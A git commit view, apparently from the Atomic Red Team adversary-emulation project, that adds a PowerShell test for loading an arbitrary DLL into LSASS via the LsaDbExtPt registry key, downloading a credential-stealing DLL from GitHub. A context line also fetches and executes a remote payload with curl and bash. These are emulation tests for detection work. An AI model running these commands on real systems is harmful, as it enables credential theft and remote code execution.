Merge branch 'master' into t1547008

New Atomic - T1547.008
Update T1115.yaml
2022-08-22 20:59:15 -06:00 · 2022-08-22 20:54:09 -06:00 · 2022-08-17 15:27:10 -06:00 · 2022-08-17 15:21:46 -06:00
2 changed files with 35 additions and 39 deletions
@@ -734,42 +734,4 @@ atomic_tests:
    command: |
      curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
    cleanup_command: |
-      del #{payload_name}
-    name: sh
- name: Nimgrab - Transfer Files
-  auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
-  description: |
-    Use nimgrab.exe to download a file from the web. 
-  supported_platforms:
-  - windows
-  input_arguments:
-    remote_file:
-      description: URL of file to copy
-      type: Url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
-    local_path:
-      description: Local path to place file
-      type: Path
-      default: Atomic-license.txt
-    destination_path:
-      description: Destination path to file
-      type: Path
-      default: $env:TEMP\Atomic-license.txt
-  executor:
-    command: |
-      cmd /c nimgrab.exe #{remote_file} #{local_path}
-    cleanup_command: |
-      del #{local_path} >nul 2>&1
-    name: command_prompt
-  dependencies: 
-    - description: |
-        NimGrab must be installed on system.
-      prereq_command: |
-        if (Test-Path "$env:temp\nimgrab.exe") {exit 0} else {exit 1}
-      get_prereq_command: |
-        Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
-        Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim
-        Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{destination_path}
-        Remove-Item $env:temp\nim
-        Remove-Item $env:temp\nim.zip
- 
+      del #{payload_name}
@@ -0,0 +1,34 @@
+attack_technique: T1547.008
+display_name: 'Boot or Logon Autostart Execution: LSASS Driver'
+atomic_tests:
+- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
+  description: |
+    The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS. 
+    
+    Upon execution, the registry key will be modified and a value will contain the path to the DLL. 
+    Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
+    Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_path:
+      description: Module to be loaded into LSASS
+      type: Path
+      default: '$env:TEMP\lsass_lib.dll'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      lsass_lib.dll must exist on disk at specified location (#{dll_path})
+    prereq_command: |
+      if (Test-Path #{dll_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/master/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}"
+  executor:
+    command: |
+      New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"
+    cleanup_command: |
+      Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS" -Name "LsaDbExtPt" -ErrorAction Ignore | Out-Null
+      Remove-Item $env:TEMP\lsass_lib.dll -Force
+    name: powershell
+    elevation_required: true
Author	SHA1	Message	Date
Michael Haag	7d666a9a7c	Merge branch 'master' into t1547008	2022-08-22 20:59:15 -06:00
Michael Haag	f3eea30be3	New Atomic - T1547.008	2022-08-22 20:54:09 -06:00
Michael Haag	2154c25000	Update T1115.yaml	2022-08-17 15:27:10 -06:00
Michael Haag	ee6dd2edd5	Linux and Windows	2022-08-17 15:21:46 -06:00